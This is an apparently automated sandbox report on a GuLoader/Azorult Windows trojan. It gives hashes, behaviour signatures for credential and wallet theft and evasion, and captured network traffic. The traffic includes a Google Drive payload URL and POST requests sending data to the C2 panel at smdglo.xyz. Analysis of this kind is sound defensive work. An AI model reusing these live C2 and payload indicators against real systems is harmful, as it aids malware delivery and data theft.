Windows Analysis Report X4lLneI8ZK.exe

Overview

General Information

Sample Name: X4lLneI8ZK.exe
Analysis ID: 479789
MD5: 4103a2b04ede0d36e5079f6799cdfa14
SHA1: 23b477810f258963e62458ed02e82c58c8c00adc
SHA256: b923011216d37106f2f497f12097ecd3412caca89edee1a49e8090b94344a310
Tags: 32exetrojan
Infos:

Most interesting Screenshot:

Detection

GuLoader Azorult
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Found malware configuration
Yara detected Azorult
Multi AV Scanner detection for submitted file
Malicious sample detected (through community Yara rule)
GuLoader behavior detected
Yara detected GuLoader
Hides threads from debuggers
Tries to steal Crypto Currency Wallets
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to detect Any.run
Tries to harvest and steal ftp login credentials
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Performs DNS queries to domains with low reputation
Self deletion via cmd delete
Tries to harvest and steal Bitcoin Wallet information
Tries to detect virtualization through RDTSC time measurements
C2 URLs / IPs found in malware configuration
Tries to steal Mail credentials (via file access)
Tries to steal Instant Messenger accounts or passwords
Tries to harvest and steal browser information (history, passwords, etc)
Uses 32bit PE files
Queries the volume information (name, serial number etc) of a device
Yara signature match
May sleep (evasive loops) to hinder dynamic analysis
Uses code obfuscation techniques (call, push, ret)
PE file contains sections with non-standard names
Internet Provider seen in connection with other malware
Detected potential crypto function
Sample execution stops while process was sleeping (likely an evasion)
JA3 SSL client fingerprint seen in connection with other malware
Contains functionality to call native functions
Found dropped PE file which has not been started or loaded
Contains functionality for execution timing, often used to detect debuggers
Abnormal high CPU Usage
Is looking for software installed on the system
Queries information about the installed CPU (vendor, model number etc)
Found inlined nop instructions (likely shell or obfuscated code)
PE file does not import any functions
Sample file is different than original file name gathered from version info
Drops PE files
Tries to load missing DLLs
Contains functionality to read the PEB
Uses a known web browser user agent for HTTP communication
Checks if the current process is being debugged
Binary contains a suspicious time stamp
PE / OLE file has an invalid certificate
Creates a process in suspended mode (likely to inject code)
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Classification

RansomwareSpreadingPhishingBankerTrojan / BotAdwareSpywareExploiterEvaderMinercleansuspiciousmalicious

AV Detection:

barindex
Found malware configuration
Source: 00000000.00000002.615028324.0000000002300000.00000040.00000001.sdmp Malware Configuration Extractor: GuLoader {"Payload URL": "https://drive.google.com/uc?export=download&id=1z63Cb8jeqd2}"}
Multi AV Scanner detection for submitted file
Source: X4lLneI8ZK.exe Virustotal: Detection: 38% Perma Link
Source: X4lLneI8ZK.exe ReversingLabs: Detection: 35%

Compliance:

barindex
Uses 32bit PE files
Source: X4lLneI8ZK.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Source: unknown HTTPS traffic detected: 142.251.36.14:443 -> 192.168.2.6:49818 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.36.1:443 -> 192.168.2.6:49819 version: TLS 1.2
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914392876.000000001FF50000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914669159.000000001FF88000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: X4lLneI8ZK.exe, 00000011.00000003.910902953.000000001F5B0000.00000004.00000001.sdmp, mozglue.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nss3.dll.17.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.17.dr
Source: Binary string: ucrtbase.pdb source: X4lLneI8ZK.exe, ucrtbase.dll.17.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, freebl3.dll.17.dr
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914669159.000000001FF88000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914024671.000000001FF2C000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.909646224.000000001F55C000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-1-0.dll.17.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, vcruntime140.dll.17.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914184884.000000001FF3C000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: X4lLneI8ZK.exe, 00000011.00000003.910902953.000000001F5B0000.00000004.00000001.sdmp, mozglue.dll.17.dr
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, freebl3.dll.17.dr
Source: Binary string: api-ms-win-core-console-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-console-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-file-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-file-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-private-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.910332025.000000001F558000.00000004.00000001.sdmp, api-ms-win-crt-private-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-convert-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914184884.000000001FF3C000.00000004.00000001.sdmp, api-ms-win-crt-convert-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb)) source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr
Source: Binary string: msvcp140.i386.pdb source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, msvcp140.dll.17.dr
Source: Binary string: ucrtbase.pdbUGP source: X4lLneI8ZK.exe, 00000011.00000003.912538712.000000001E7AC000.00000004.00000001.sdmp, ucrtbase.dll.17.dr
Source: Binary string: api-ms-win-core-profile-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-profile-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-time-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-crt-time-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb-- source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nssdbm3.dll.17.dr
Source: Binary string: api-ms-win-core-handle-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-handle-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-synch-l1-2-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.909646224.000000001F55C000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-2-0.dll.17.dr
Source: Binary string: api-ms-win-core-processenvironment-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.909154010.000000001F568000.00000004.00000001.sdmp, api-ms-win-core-processenvironment-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-datetime-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-datetime-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-conio-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914024671.000000001FF2C000.00000004.00000001.sdmp, api-ms-win-crt-conio-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-localization-l1-2-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-localization-l1-2-0.dll.17.dr
Source: Binary string: api-ms-win-crt-math-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914392876.000000001FF50000.00000004.00000001.sdmp, api-ms-win-crt-math-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\softoken_softokn3\softokn3.pdb source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, softokn3.dll.17.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-1.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-1.dll.17.dr
Source: Binary string: api-ms-win-core-namedpipe-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-namedpipe-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-multibyte-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914392876.000000001FF50000.00000004.00000001.sdmp, api-ms-win-crt-multibyte-l1-1-0.dll.17.dr
Source: Binary string: vcruntime140.i386.pdb source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, vcruntime140.dll.17.dr
Source: Binary string: api-ms-win-crt-utility-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, api-ms-win-crt-utility-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-rtlsupport-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-rtlsupport-l1-1-0.dll.17.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\softoken\legacydb\legacydb_nssdbm3\nssdbm3.pdb source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, nssdbm3.dll.17.dr
Source: Binary string: api-ms-win-core-timezone-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914024671.000000001FF2C000.00000004.00000001.sdmp, api-ms-win-core-timezone-l1-1-0.dll.17.dr
Source: Binary string: msvcp140.i386.pdbGCTL source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp, msvcp140.dll.17.dr
Source: Binary string: api-ms-win-core-string-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-core-string-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-file-l2-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-file-l2-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-process-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-crt-process-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-libraryloader-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-libraryloader-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-core-interlocked-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.913022649.000000001FECC000.00000004.00000001.sdmp, api-ms-win-core-interlocked-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-heap-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000003.914392876.000000001FF50000.00000004.00000001.sdmp, api-ms-win-crt-heap-l1-1-0.dll.17.dr
Source: Binary string: api-ms-win-crt-string-l1-1-0.pdb source: X4lLneI8ZK.exe, 00000011.00000002.934477385.000000001F720000.00000004.00000001.sdmp, api-ms-win-crt-string-l1-1-0.dll.17.dr

Software Vulnerabilities:

barindex
Found inlined nop instructions (likely shell or obfuscated code)
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 4x nop then mov ecx, ecx 0_2_00401B77
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 4x nop then mov ecx, ecx 0_2_00402D9F

Networking:

barindex
Performs DNS queries to domains with low reputation
Source: DNS query: smdglo.xyz
C2 URLs / IPs found in malware configuration
Source: Malware configuration extractor URLs: https://drive.google.com/uc?export=download&id=1z63Cb8jeqd2}
Internet Provider seen in connection with other malware
Source: Joe Sandbox View ASN Name: PLUSSERVER-ASN1DE PLUSSERVER-ASN1DE
JA3 SSL client fingerprint seen in connection with other malware
Source: Joe Sandbox View JA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
Uses a known web browser user agent for HTTP communication
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1z63Cb8jeqd2y20-L4yBkWSNGOI62mzhE HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/fkchcv79jnjfnc5h291r5b1jhco7oja2/1631103525000/09352478152086662440/*/1z63Cb8jeqd2y20-L4yBkWSNGOI62mzhE?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-b4-docs.googleusercontent.comConnection: Keep-Alive
Source: global traffic HTTP traffic detected: POST /panel/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: smdglo.xyzContent-Length: 107Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 ff 4c 2f fb 3a 2f fb 39 2f fb 3c 2f fb 3d 2f fb 3a 2f fa 49 2f fb 34 2f fb 34 4b ed 3e 3c ed 3e 33 8c 28 39 f9 48 2f fa 49 4b 8c 4b 2f fb 35 2f fb 3b 2f fb 3c 2f fb 3d 4c ed 3e 3b Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9L/:/9/</=/:/I/4/4K><>3(9H/IKK/5/;/</=L>;
Source: global traffic HTTP traffic detected: POST /panel/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: smdglo.xyzContent-Length: 89809Cache-Control: no-cache
Source: unknown Network traffic detected: HTTP traffic on port 49819 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 49818 -> 443
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49819
Source: unknown Network traffic detected: HTTP traffic on port 443 -> 49818
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: X4lLneI8ZK.exe String found in binary or memory: http://crl.globalsign.com/ca/gstsacasha384g4.crl0
Source: X4lLneI8ZK.exe String found in binary or memory: http://crl.globalsign.com/root-r6.crl0G
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: http://ocsp.digicert.com0C
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: http://ocsp.digicert.com0N
Source: X4lLneI8ZK.exe String found in binary or memory: http://ocsp.globalsign.com/ca/gstsacasha384g40C
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: http://ocsp.thawte.com0
Source: X4lLneI8ZK.exe String found in binary or memory: http://ocsp2.globalsign.com/rootr606
Source: X4lLneI8ZK.exe String found in binary or memory: http://secure.globalsign.com/cacert/gstsacasha384g4.crt0
Source: X4lLneI8ZK.exe, 00000011.00000002.933642572.000000001E420000.00000004.00000001.sdmp String found in binary or memory: http://smdglo.xyz/panel/index.php
Source: X4lLneI8ZK.exe, 00000011.00000002.933642572.000000001E420000.00000004.00000001.sdmp String found in binary or memory: http://smdglo.xyz/panel/index.phpB
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: mozglue.dll.17.dr String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: http://www.mozilla.com0
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/Fhttps://www.google.com/chrome/Ap
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp String found in binary or memory: http://www.msn.com/de-chP
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=2542116;cat=chom0;ord=9774759596232;g
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=chrom322;cat=chrom01g;ord=30055406629
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp String found in binary or memory: https://2542116.fls.doubleclick.net/activityi;src=2542116;type=clien612;cat=chromx;ord=1;num=7859736
Source: 155799843460763056844440.tmp.17.dr String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp String found in binary or memory: https://adservice.google.co.uk/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gt
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp String found in binary or memory: https://adservice.google.com/ddm/fls/i/src=2542116;type=chrom322;cat=chrom01g;ord=3005540662929;gtm=
Source: 155799843460763056844440.tmp.17.dr String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.p
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.php
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.php:http://www.msn.com/de-ch/Zhttps://contextual.media.net/me
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.php?&vsSync=1&cs=1&hb=1&cv=37&ndec=1&cid=8HBI57XIG&prvid=77%2
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp String found in binary or memory: https://contextual.media.net/checksync.phpd=
Source: 155799843460763056844440.tmp.17.dr String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: 155799843460763056844440.tmp.17.dr String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: 155799843460763056844440.tmp.17.dr String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: 155799843460763056844440.tmp.17.dr String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: 155799843460763056844440.tmp.17.dr String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: X4lLneI8ZK.exe, 00000011.00000003.910599666.000000001F558000.00000004.00000001.sdmp, mozglue.dll.17.dr String found in binary or memory: https://www.digicert.com/CPS0
Source: X4lLneI8ZK.exe String found in binary or memory: https://www.globalsign.com/repository/0
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.html
Source: X4lLneI8ZK.exe, 00000011.00000002.935134026.000000001FB70000.00000004.00000001.sdmp String found in binary or memory: https://www.google.com/chrome/thank-you.htmlP
Source: 155799843460763056844440.tmp.17.dr String found in binary or memory: https://www.google.com/images/branding/product/ico/googleg_lodp.ico
Source: unknown HTTP traffic detected: POST /panel/index.php HTTP/1.1User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)Host: smdglo.xyzContent-Length: 107Cache-Control: no-cacheData Raw: 4a 4f ed 3e 32 ed 3e 3c 89 28 39 fe 49 2f fb 38 2f fa 49 4c ed 3e 33 ed 3e 3e ed 3e 3b ed 3e 3e ed 3e 33 ed 3e 3a ed 3e 3d ed 3f 4e 89 28 39 ff 4c 2f fb 3a 2f fb 39 2f fb 3c 2f fb 3d 2f fb 3a 2f fa 49 2f fb 34 2f fb 34 4b ed 3e 3c ed 3e 33 8c 28 39 f9 48 2f fa 49 4b 8c 4b 2f fb 35 2f fb 3b 2f fb 3c 2f fb 3d 4c ed 3e 3b Data Ascii: JO>2><(9I/8/IL>3>>>;>>>3>:>=?N(9L/:/9/</=/:/I/4/4K><>3(9H/IKK/5/;/</=L>;
Source: unknown DNS traffic detected: queries for: drive.google.com
Source: global traffic HTTP traffic detected: GET /uc?export=download&id=1z63Cb8jeqd2y20-L4yBkWSNGOI62mzhE HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoHost: drive.google.comCache-Control: no-cache
Source: global traffic HTTP traffic detected: GET /docs/securesc/ha0ro937gcuc7l7deffksulhg5h7mbp1/fkchcv79jnjfnc5h291r5b1jhco7oja2/1631103525000/09352478152086662440/*/1z63Cb8jeqd2y20-L4yBkWSNGOI62mzhE?e=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like GeckoCache-Control: no-cacheHost: doc-0g-b4-docs.googleusercontent.comConnection: Keep-Alive
Source: unknown HTTPS traffic detected: 142.251.36.14:443 -> 192.168.2.6:49818 version: TLS 1.2
Source: unknown HTTPS traffic detected: 142.251.36.1:443 -> 192.168.2.6:49819 version: TLS 1.2

System Summary:

barindex
Malicious sample detected (through community Yara rule)
Source: 17.2.X4lLneI8ZK.exe.1fb9a0b0.4.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 17.2.X4lLneI8ZK.exe.1fc277ee.6.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Source: 17.2.X4lLneI8ZK.exe.1fbbc09d.5.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer Payload Author: kevoreilly
Uses 32bit PE files
Source: X4lLneI8ZK.exe Static PE information: LOCAL_SYMS_STRIPPED, 32BIT_MACHINE, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, RELOCS_STRIPPED
Yara signature match
Source: 17.2.X4lLneI8ZK.exe.1fb9a0b0.4.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 17.2.X4lLneI8ZK.exe.1fc277ee.6.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Source: 17.2.X4lLneI8ZK.exe.1fbbc09d.5.raw.unpack, type: UNPACKEDPE Matched rule: OlympicDestroyer_1 author = kevoreilly, description = OlympicDestroyer Payload, cape_type = OlympicDestroyer Payload
Detected potential crypto function
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_00401B77 0_2_00401B77
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0040301D 0_2_0040301D
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_00402E23 0_2_00402E23
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_00402EA4 0_2_00402EA4
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_004030A6 0_2_004030A6
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0040154E 0_2_0040154E
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0040135F 0_2_0040135F
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_00402F2B 0_2_00402F2B
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0040312C 0_2_0040312C
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_0040159B 0_2_0040159B
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_00402D9F 0_2_00402D9F
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_00402FA3 0_2_00402FA3
Source: C:\Users\user\Desktop\X4lLneI8ZK.exe Code function: 0_2_02308A39 0_2_02308A39
